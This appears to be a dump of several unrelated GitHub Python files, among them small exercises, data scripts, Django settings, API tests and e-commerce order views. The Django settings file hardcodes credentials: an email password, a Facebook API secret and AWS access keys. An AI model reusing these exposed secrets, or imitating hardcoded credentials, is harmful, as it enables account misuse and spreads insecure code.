try:\r\n for k in range(j, len(stringnumber)):\r\n if stringnumber[j] > stringnumber[k]:\r\n string1 = str(ten - 1)\r\n for x in range(j, len(stringnumber) - 1):\r\n string1 += \"9\"\r\n stringnumber = stringnumber[:j] + string1\r\n\r\n except:\r\n continue\r\n\r\n count = (int(stringnumber))\r\n print(count)\r\n print(\"Case #\" + str(y) + \": \" + str(count), file=f)\r\n\r\nf.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3538.py","file_name":"3538.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13215850541","text":"import csv\nimport glob\nfrom tibbslib import *\nimport shutil\nload_states()\ninfo=get_json('data\\\\info.json')\ninfo['statedata']='wind_nrel'\n\n\nourstates = [\"iowaminnesota\",\"northtexasoklahoma\",\"texasercot\",\"kansas\"]\n\n\n\n#siteid=[]\nlngs=[]\nlats=[]\nn=0\nfor name in glob.glob('unknown\\\\*.csv'):\n #purename=name.split('\\\\')[-1]\n #siteid.append(purename.split('-')[0])\n with open(name,'r') as readfile:\n reader=csv.reader(readfile,lineterminator='\\n')\n n+=1\n nrow=0\n for row in reader:\n nrow+=1\n if nrow==2:\n lng=float(row[1])\n lngs.append(lng)\n elif nrow==3:\n lat=float(row[1])\n lats.append(lat)\n else:\n continue\n if n==1:\n for ourstate in ourstates:\n if point_in_poly(Point(lng,lat), states[ourstate].poly):\n print(ourstate)\n statename=ourstate\n else:\n break\n\nmove=0\nfor name in glob.glob('unknown\\\\*.csv'):\n pure_name=name.split('\\\\')[-1]\n #print(pure_name)\n if not os.path.isfile(info[\"statedata\"]+\"\\\\\"+statename+\"\\\\\"+pure_name):\n move+=1\n if move%500==0:\n print('moving files',str(move))\n shutil.copyfile(name,info[\"statedata\"]+\"\\\\\"+statename+\"\\\\\"+pure_name)","repo_name":"qingninglily/WeatherRiskManagement","sub_path":"statesintofolders_wind.py","file_name":"statesintofolders_wind.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25846137600","text":"from phml.compiler.steps.base import scoped_step\nfrom phml.nodes import Element, Parent\n\n\n@scoped_step\ndef step_replace_phml_wrapper(node: Parent, *_):\n for child in list(node):\n if isinstance(child, Element) and child.tag in [\"\", \"Template\"]:\n idx = node.index(child)\n for c in child:\n if isinstance(c, Element):\n c.context.update(child.context)\n\n del node[idx]\n node.insert(idx, child.children or [])\n","repo_name":"Tired-Fox/phml","sub_path":"phml/compiler/steps/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"1287554012","text":"from menu import *\n\nstart = True\ncost = 0\n\ndef enough_resources(order_resources):\n for item in order_resources:\n if order_resources[item] > resources[item]:\n print(f\"Sorry there is not enough {item}.\")\n return False\n return True\n\ndef process_coins():\n print(\"Please insert coins.\")\n total = int(input(\"How many quarters?: \")) * 0.25\n total += int(input(\"How many dimes?: \")) * 0.1\n total += int(input(\"How many nickles?: \")) * 0.05\n total += int(input(\"How many pennies?: \")) * 0.01\n return total\n\ndef transaction_successful(money, cost_coffee):\n if money >= cost_coffee:\n change = round(money - cost_coffee, 2)\n print(f\"Here is ${change} in change.\")\n global cost\n cost += cost_coffee\n return True\n else:\n print(\"Sorry that's not enough money.\")\n return False\n\n\ndef make_coffee(drink_name, order_resources):\n for item in order_resources:\n resources[item] -= order_resources[item]\n print(f\"Here is your {drink_name} ☕ \")\n\nwhile start:\n choice = input(\"What you would like? (espresso/latte/cappuccino): \")\n if choice == \"off\":\n start = False\n elif choice == \"report\":\n print(f\"Water: {resources['water']}ml\")\n print(f\"Milk: {resources['milk']}ml\")\n print(f\"Coffee: {resources['coffee']}g\")\n print(f\"Money: {cost}$\")\n else:\n drink = MENU[choice]\n if enough_resources(drink[\"ingredients\"]):\n payment = process_coins()\n if transaction_successful(payment, drink[\"cost\"]):\n make_coffee(choice, drink[\"ingredients\"])\n\n\n\n\n\n","repo_name":"despoina77/100projects","sub_path":"Coffee_Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16720035597","text":"# Django settings for fratevents project.\nimport os, os.path, social_auth\n\nif os.environ.has_key('DATABASE_URL'):\n DEBUG = True\nelse:\n DEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Sanchit Bareja', 'sanchitbareja@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nif os.environ.has_key('DATABASE_URL'):\n import dj_database_url\n DATABASES = {'default': dj_database_url.config(default='postgres://localhost')}\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'fratevents', # Or path to database file if using sqlite3.\n 'USER': 'postgres', # Not used with sqlite3.\n 'PASSWORD': 'root', # Not used with sqlite3.\n 'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n }\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/Los_Angeles'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = False\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/static/'\n\nSEND_BROKEN_LINK_EMAILS = True\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = '/static/'\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = os.path.join(os.path.dirname(__file__), 'static/').replace('\\\\','/')\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(os.path.dirname(__file__), 'static/').replace('\\\\','/'),\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'rsx9)l1^_bsmeyipfk9u#t#gdt%@po-i-hr+#8ensmg012!kpn'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'social_auth.middleware.SocialAuthExceptionMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'fratevents.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'fratevents.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(os.path.dirname(__file__), 'views').replace('\\\\','/'),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n # 'django.contrib.admindocs',\n 'south',\n 'gunicorn',\n 'events',\n 'clubs',\n 'rage',\n 'userprofile',\n 'social_auth',\n 'storages',\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# EMAIL SETTINGS\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'caleventsinfo@gmail.com'\nEMAIL_HOST_PASSWORD = 'qwaszx12,'\nEMAIL_PORT = 587\n\nEVENT_MASTERS = ['sanchitbareja@gmail.com','hahardikagrawal@gmail.com','caleventsinfo@gmail.com']\n\n# Facebook Integration Settings\nAUTHENTICATION_BACKENDS = (\n 'social_auth.backends.facebook.FacebookBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\n# userprofile creation \nAUTH_PROFILE_MODULE = 'userprofile.UserProfile'\n\nFACEBOOK_APP_ID = '343708889077375'\nFACEBOOK_API_SECRET = '0bd34d3dbb482579fb990805860267bd'\nFACEBOOK_EXTENDED_PERMISSIONS = ['email', 'user_birthday', 'user_interests', 'user_events', 'manage_pages']\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.contrib.messages.context_processors.messages',\n 'social_auth.context_processors.social_auth_by_type_backends',\n)\n\nLOGIN_REDIRECT_URL = '/'\n\nSOCIAL_AUTH_PIPELINE = (\n 'social_auth.backends.pipeline.social.social_auth_user',\n #'social_auth.backends.pipeline.associate.associate_by_email',\n 'social_auth.backends.pipeline.user.get_username',\n 'social_auth.backends.pipeline.user.create_user',\n 'social_auth.backends.pipeline.social.associate_user',\n 'social_auth.backends.pipeline.social.load_extra_data',\n 'social_auth.backends.pipeline.user.update_user_details',\n 'fratevents.pipeline.create_user_profile',\n 'fratevents.pipeline.get_user_profile_pic',\n 'fratevents.pipeline.get_user_events',\n 'fratevents.pipeline.get_user_network',\n 'fratevents.pipeline.get_user_pages',\n)\n\nSOCIAL_AUTH_CREATE_USERS = True\nSOCIAL_AUTH_FORCE_RANDOM_USERNAME = False\nSOCIAL_AUTH_DEFAULT_USERNAME = 'socialauth_user'\nSOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'\nLOGIN_ERROR_URL = '/login/error/'\nSOCIAL_AUTH_ERROR_KEY = 'socialauth_error'\nSOCIAL_AUTH_FORCE_POST_DISCONNECT = True\n\n#AWS S3 Credentials - django-storages\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\nAWS_ACCESS_KEY_ID = 'AKIAISDEISAIY3LRYY3Q'\nAWS_SECRET_ACCESS_KEY = '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'\nAWS_STORAGE_BUCKET_NAME = 'calevents'\nBUCKET_NAME = 'calevents'\nfrom S3 import CallingFormat\nAWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN\nAWS_UPLOAD_DESTINATION = \"http://s3.amazonaws.com/\"+str(BUCKET_NAME)+\"/\"\n","repo_name":"sanchitbareja/fratevents","sub_path":"fratevents/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33506622695","text":"import jax\nimport jax.numpy as jnp\nimport haiku as hk\n\nimport configlib\n\nclass MainModel(hk.Module):\n def __init__(self, config: configlib.Config):\n super().__init__()\n self.config = config\n self.latent_dim = config.latent_dim\n self.decoder_output_dim = config.decoder_output_dim\n \n if config.activation == \"relu\":\n self.activation = jax.nn.relu\n elif config.activation == \"leaky_relu\":\n self.activation = lambda x: jax.nn.leaky_relu(x, negative_slope=config.negative_slope)\n elif config.activation == \"tanh\":\n self.activation = jnp.tanh\n elif config.activation == \"elu\":\n self.activation = lambda x: jax.nn.elu(x, alpha=config.elu_alpha)\n else:\n raise NotImplementedError\n\n","repo_name":"amir-sabzi/DP_VAE","sub_path":"models/MainModel.py","file_name":"MainModel.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11829577808","text":"'''\n@Created by yuhsiang\n@Date : 2018/12/7\n'''\n\nimport time\nimport unittest\n\nfrom parameterized import parameterized\nfrom data_config.system_config import systemSetting\nfrom base.HTMLTestReportCN import HTMLTestRunner\nfrom base.httpRequest import HttpRequest\nfrom data_config import master_config\nfrom master_api import member_and_agent\nfrom master_api.account_login import User\n\n\nclass FixVerifyAuditTypeField(unittest.TestCase):\n \"\"\"驗證存款類型於即時稽核顯示邏輯\"\"\"\n\n def setUp(self):\n self.config = systemSetting() # 系統參��\n self.__http = HttpRequest()\n self.user = User(self.__http)\n self.memberSearch = member_and_agent.MemberSearch(self.__http)\n self.memberDeposit = member_and_agent.MemberDeposit(self.__http)\n self.user.login()\n\n def tearDown(self):\n self.user.logout()\n\n @parameterized.expand([\n # 免稽核 - 優惠金額\n (\"verify_audit_type_field\", \"None\", 5),\n (\"verify_audit_type_field\", \"None\", 6),\n # 存款稽核 - 存款金額\n (\"verify_audit_type_field\", \"Deposit\", 5),\n (\"verify_audit_type_field\", \"Deposit\", 6),\n # 優惠稽核 - 優惠金額\n (\"verify_audit_type_field\", \"Discount\", 5),\n (\"verify_audit_type_field\", \"Discount\", 6),\n ])\n def testCase(self, name, audit_type, select_type):\n # 測試案例名稱、稽核方式、类型\n # Step1 取得人工存入的token\n response_data = self.memberDeposit.deposit_token({})\n\n # Step2 人工存入api 呼叫\n data = {\"AccountsString\": self.config.test_Member_config(),\n \"AmountString\": \"1\",\n \"AuditType\": audit_type,\n \"Audit\": 0.01,\n \"Type\": select_type,\n \"IsReal\": 'false',\n \"Memo\": \"test\",\n \"PortalMemo\": \"\",\n \"Password\": \"123456\",\n \"DepositToken\": response_data[1],\n \"TimeStamp\": time.time()}\n self.submit = self.memberDeposit.deposit_submit(data)\n\n # Step3 取得目前帳戶即時稽核詳細\n data = {\"account\": self.config.test_Member_config()}\n response_data = self.memberSearch.get_audit_detail(data)\n deposit_amount = response_data[1]['WithdrawAuditDataList'][0]['Amount']\n discount_amount = response_data[1]['WithdrawAuditDataList'][0]['Discount']\n\n if audit_type == \"None\" and (not [discount_amount] is None):\n flag_status = True\n elif audit_type == \"Deposit\" and (not [deposit_amount] is None):\n flag_status = True\n elif audit_type == \"Discount\" and (not [discount_amount] is None):\n flag_status = True\n else:\n flag_status = False\n\n # Step4 進行驗證\n self.assertEqual(flag_status, True)\n\n\nif __name__ == '__main__':\n unittest.main(testRunner = HTMLTestRunner())\n","repo_name":"eos1209/auto_test","sub_path":"case/test_api/test_FlowCase/test_Master_Flow_FixVerifyAuditTypeField.py","file_name":"test_Master_Flow_FixVerifyAuditTypeField.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37210473000","text":"from django.conf.urls import url\n\nfrom .views import dashboard, logout_view, register_view, login_view\n\nurlpatterns = [\n url(r'^dashboard/', dashboard, name=\"index\"),\n url(r'^login/', login_view, name=\"login\"),\n url(r'^register/', register_view, name=\"register\"),\n url(r'^logout/', logout_view, name=\"logout\"),\n]\n","repo_name":"ericabbey/recon","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23771275978","text":"# Import for the Desktop Bot\nfrom botcity.core import DesktopBot\n\n# Import for integration with BotCity Maestro SDK\nfrom botcity.maestro import *\n\n# Disable errors if we are not connected to Maestro\nBotMaestroSDK.RAISE_NOT_CONNECTED = False\n\nfrom changeSeparator import change_separator\ndef main():\n # Runner passes the server url, the id of the task being executed,\n # the access token and the parameters that this task receives (when applicable).\n maestro = BotMaestroSDK.from_sys_args()\n ## Fetch the BotExecution with details from the task, including parameters\n execution = maestro.get_execution()\n\n print(f\"Task ID is: {execution.task_id}\")\n print(f\"Task Parameters are: {execution.parameters}\")\n\n bot = DesktopBot()\n change_separator(bot,\".\", \",\")\n bot.wait(2000)\n change_separator(bot,\",\", \".\")\n \n\n \n\n\n\n\n\n\n\n # Implement here your logic...\n ...\n\n # Uncomment to mark this task as finished on BotMaestro\n # maestro.finish_task(\n # task_id=execution.task_id,\n # status=AutomationTaskFinishStatus.SUCCESS,\n # message=\"Task Finished OK.\"\n # )\n\ndef not_found(label):\n print(f\"Element not found: {label}\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"olucascruz/BotChangeFormatNumber","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22461426207","text":"#!/usr/bin/python3\n\nimport random;\nimport countdowntourney;\nimport htmlform;\nimport cgicommon\nimport urllib.request, urllib.parse, urllib.error;\nimport re\nimport fixgen\nimport fixgen_manual\n\nname = \"Raw\"\ndescription = \"You have full control over how many matches are in the round and who plays whom. There are no table groups, and there is no requirement that all players play. Use this generator if you want a knockout stage or one-off game.\"\n\nspecial_round_names = {\n \"QF\" : \"Quarter-finals\",\n \"SF\" : \"Semi-finals\",\n \"3P\" : \"Third-place playoff\",\n \"F\" : \"Final\"\n}\n\ndef int_or_none(s):\n try:\n value = int(s)\n return value\n except:\n return None\n\ndef get_user_form(tourney, settings, div_rounds):\n num_divisions = tourney.get_num_divisions()\n div_num_games = dict()\n div_game_types = dict()\n\n players = sorted(tourney.get_active_players(), key=lambda x : x.get_name());\n\n latest_round_no = tourney.get_latest_round_no()\n if latest_round_no is None:\n latest_round_no = 0\n\n prev_settings = settings.get_previous_settings()\n for key in prev_settings:\n if key not in settings and re.match(\"^d[0-9]*_groupsize$\", key):\n settings[key] = prev_settings[key]\n if settings.get(\"submitrestore\", None):\n for key in prev_settings:\n if key not in [\"submit\", \"submitrestore\", \"submitplayers\"]:\n settings[key] = prev_settings[key]\n\n elements = []\n elements.append(htmlform.HTMLFormHiddenInput(\"numgamessubmit\", \"1\"))\n elements.append(htmlform.HTMLFormHiddenInput(\"roundno\", str(latest_round_no + 1)))\n\n # If there's a previously-saved form for this round, offer to load it\n prev_settings = settings.get_previous_settings()\n round_no = int_or_none(prev_settings.get(\"roundno\", None))\n if round_no is not None and round_no == latest_round_no + 1:\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"\\\"Info\\\"\"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFragment(\"There is an incomplete fixtures form saved. Do you want to carry on from where you left off?\"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFormSubmitButton(\"submitrestore\", \"Restore previously-saved form\"))\n elements.append(htmlform.HTMLFragment(\"

      \"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n\n # When we pass these settings to fixgen_manual, we don't want it asking\n # awkward questions about the number of players in a group when we're\n # fixing at it two, so tell it that's already been submitted.\n settings[\"tablesizesubmit\"] = \"1\"\n\n for div_index in div_rounds:\n num_games_name = \"d%d_num_groups\" % (div_index)\n game_type_name = \"d%d_game_type\" % (div_index)\n\n # For fully-manual, number of players per group is always 2,\n # we're allowed to put a player on more than one table, and there is\n # no requirement that all players play.\n settings[\"d%d_groupsize\" % (div_index)] = \"2\"\n settings[\"d%d_allow_player_repetition\" % (div_index)] = \"1\"\n settings[\"d%d_allow_unselected_players\" % (div_index)] = \"1\"\n\n # Also we want fixgen_manual to show the standings table for each\n # division.\n settings[\"d%d_show_standings\" % (div_index)] = \"1\"\n\n if settings.get(num_games_name, None) is not None:\n try:\n div_num_games[div_index] = int(settings.get(num_games_name))\n if div_num_games[div_index] < 0:\n div_num_games[div_index] = 0\n except ValueError:\n div_num_games[div_index] = 0\n else:\n div_num_games[div_index] = 0\n\n if settings.get(game_type_name, None) is not None:\n try:\n div_game_types[div_index] = settings.get(game_type_name)\n if div_game_types[div_index] in special_round_names:\n settings[\"d%d_round_name\" % (div_index)] = special_round_names[div_game_types[div_index]]\n except ValueError:\n div_game_types[div_index] = None\n\n if num_divisions > 1:\n elements.append(htmlform.HTMLFragment(\"

      %s

      \" % (cgicommon.escape(tourney.get_division_name(div_index)))))\n\n elements.append(htmlform.HTMLFragment(\"
      \"))\n num_games_element = htmlform.HTMLFormNumberInput(\"Number of games to create\", num_games_name, 1, other_attrs={\"min\" : 1})\n elements.append(num_games_element)\n elements.append(htmlform.HTMLFragment(\"
      \"))\n\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFragment(\"Create games of this type: \"))\n\n game_type_options = [ htmlform.HTMLFormDropDownOption(x[\"code\"], x[\"name\"] + \" (\" + x[\"code\"] + \")\") for x in countdowntourney.get_game_types() ]\n type_element = htmlform.HTMLFormDropDownBox(\"d%d_game_type\" % (div_index), game_type_options)\n\n current_setting = settings.get(\"d%d_game_type\" % (div_index))\n if current_setting:\n type_element.set_value(current_setting)\n elements.append(type_element)\n elements.append(htmlform.HTMLFragment(\"
      \"))\n\n num_games_total = sum( [ div_num_games[x] for x in div_num_games ] )\n\n if num_games_total == 0 or not(settings.get(\"numgamessubmit\", \"\")):\n elements.append(htmlform.HTMLFragment(\"
      \"))\n elements.append(htmlform.HTMLFormSubmitButton(\"submit\", \"Continue\"))\n elements.append(htmlform.HTMLFragment(\"
      \"))\n return htmlform.HTMLForm(\"POST\", \"/cgi-bin/fixturegen.py?tourney=%s\" % (urllib.parse.quote_plus(tourney.name)), elements)\n else:\n return fixgen_manual.get_user_form(tourney, settings, div_rounds)\n\ndef check_ready(tourney, div_rounds):\n for div in div_rounds:\n round_no = div_rounds[div]\n existing_games = tourney.get_games(round_no=round_no, division=div)\n if existing_games:\n return (False, \"%s: round %d already has %d games in it.\" % (tourney.get_division_name(div), round_no, len(existing_games)))\n return (True, None)\n\ndef generate(tourney, settings, div_rounds):\n return fixgen_manual.generate(tourney, settings, div_rounds, check_ready)\n\ndef save_form_on_submit():\n return True\n","repo_name":"elocemearg/atropine","sub_path":"generators/fixgen_raw.py","file_name":"fixgen_raw.py","file_ext":"py","file_size_in_byte":6876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4228770300","text":"from .serializers import OrderSerializer\nfrom .models import Order\nfrom rest_framework.viewsets import ModelViewSet\nfrom rest_framework.generics import ListAPIView, RetrieveAPIView\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.filters import SearchFilter,OrderingFilter\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom user.permissions import IsAdminUser\nfrom rest_framework.views import APIView\nfrom backend_greenie.utils.response_formatting import FormattedResponse\nfrom .model_helpers import StatusType\nfrom user.models import DeleveryAddress\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom product.models import Product\nfrom django.db.models import Q\nfrom django.db.models import Prefetch\nfrom order.models import Purchase\nfrom user.serializers import DeleveryAddressSerializer\nfrom user.model_helpers import AddressType\n\nfrom integeration.braintree.braintree_main import BrainTreeMain\nbt = BrainTreeMain()\ntoken = bt.gateway.client_token.generate()\n# print(token)\nclass OrderListView(ListAPIView):\n \"\"\"\n List of orders.\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n\n serializer_class = OrderSerializer\n filter_backends = [DjangoFilterBackend, SearchFilter]\n filterset_fields = ['id','user','product__name', 'product__category__name', 'status']\n search_fields = ['user__name', 'product__name', 'product__category__name']\n\n page_size = 20\n\n def get_queryset(self):\n user = self.request.user\n greenie_user = user.greenie_user\n\n if self.request.query_params.get('status', None):\n status_vals = self.request.query_params.get('status').split(',')\n orders = Order.objects.filter(status__in = status_vals, user=greenie_user).order_by('-modified')\n else :\n orders = Order.objects.filter(is_active=True).order_by('-modified')\n\n return orders\n\n def list(self, request, *args, **kwargs):\n # call the original 'list' to get the original response\n response = super(OrderListView, self).list(request, *args, **kwargs)\n\n return FormattedResponse(response.data)\n\nclass OrderDetailView(RetrieveAPIView):\n \"\"\"\n Order detail: Single object\n \"\"\"\n uthentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n queryset = Order.objects.filter(is_active=True)\n serializer_class = OrderSerializer\n lookup_field = 'id'\n\n def get(self, request, *args, **kwargs):\n data = super(OrderDetailView, self).get(request, *args, **kwargs)\n return FormattedResponse(msg='Order Data Fetch successully.', data=data.data).create()\n\nclass CartView(APIView):\n \"\"\"\n Add to card.\n Remove From Cart\n Get Cart Items.\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n\n def post(self, request, format=None):\n user = request.user\n greenie_user = user.greenie_user\n product = request.data['product_id']\n keep_in_cart = request.data['is_add'] # add or remove item from cart\n\n try:\n product = Product.objects.get(id=product)\n except ObjectDoesNotExist:\n return FormattedResponse(error=True, msg='Product not exist.', data={}).create() \n if keep_in_cart:\n Order.objects.create(user=greenie_user, product=product, status=StatusType.ADDED_TO_CART)\n query_data = Order.objects.filter(user=greenie_user, is_active=True, status=StatusType.ADDED_TO_CART)\n response_data = OrderSerializer(query_data, many=True).data\n return FormattedResponse(msg='Added to Cart Successfully.', data=response_data).create()\n else:\n orders = Order.objects.filter(user=greenie_user, is_active=True, status=StatusType.ADDED_TO_CART)\n current_product_in_cart = orders.filter(product=product)\n if len(current_product_in_cart):\n order = current_product_in_cart.latest('modified')\n order.status = StatusType.VIEWED\n order.save()\n response_data = OrderSerializer(orders, many=True).data\n return FormattedResponse(msg='Removed from cart', data=response_data).create()\n\n def get(self, request, format=None):\n user = request.user\n greenie_user = user.greenie_user\n query_data = Order.objects.filter(user=greenie_user, is_active=True, status=StatusType.ADDED_TO_CART)\n response_data = OrderSerializer(query_data, many=True).data\n return FormattedResponse(msg='Cart fetched.', data=response_data).create()\n\nclass CreateOrderView(APIView):\n \"\"\"\n create an order.\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, )\n\n def post(self, request, format=None):\n user = request.user\n greenie_user = user.greenie_user\n # body : {\"products\": {\"id1\": 2, \"id2\": 3}}\n is_order_through_cart = request.data['is_order_through_cart']\n address = request.data['address_id']\n \n try:\n address_obj = DeleveryAddress.objects.get(id =address)\n except ObjectDoesNotExist:\n return FormattedResponse(error=True, msg='First Add Delevery Address.').create()\n\n if not is_order_through_cart:\n products = request.data.get('products')\n products_query = Product.objects.filter(id__in=products.keys())\n if len(products_query) != len(products):\n return FormattedResponse(error=True, msg=\"All Product must exist.\").create()\n\n for product in products_query:\n for _ in range(products[product]):\n order_obj = Order.objects.create(user=greenie_user, product=product, status = StatusType.PAYMENT_PENDING)\n else:\n orders = Order.objects.filter(user=greenie_user, status=StatusType.ADDED_TO_CART, is_active=True)\n for order in orders:\n order.status = StatusType.PAYMENT_PENDING\n order.save()\n \n # TODO: First get payment \n # Create Txn \n # Mark order completed\n orders = Order.objects.filter(user=greenie_user, status=StatusType.PAYMENT_PENDING, is_active=True)\n response_data = OrderSerializer(orders, many=True).data\n return FormattedResponse(msg='Orders Awaiting payment.', data=response_data).create()","repo_name":"devraj4522/backend-greenie","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2900730812","text":"from django import forms\nfrom django.forms.widgets import ClearableFileInput\nfrom .models import Post, Category, Comment\n\n# Retrieve all category names and store them in a tuple\nchoices = Category.objects.all().values_list('name', 'name')\n\n# Create an empty list to store category choices\nchoices_list = []\n\n# Iterate through the choices and append each choice to the choices_list\nfor item in choices:\n choices_list.append(item)\n\n# Create a form for adding new posts, inheriting from forms.ModelForm\nclass 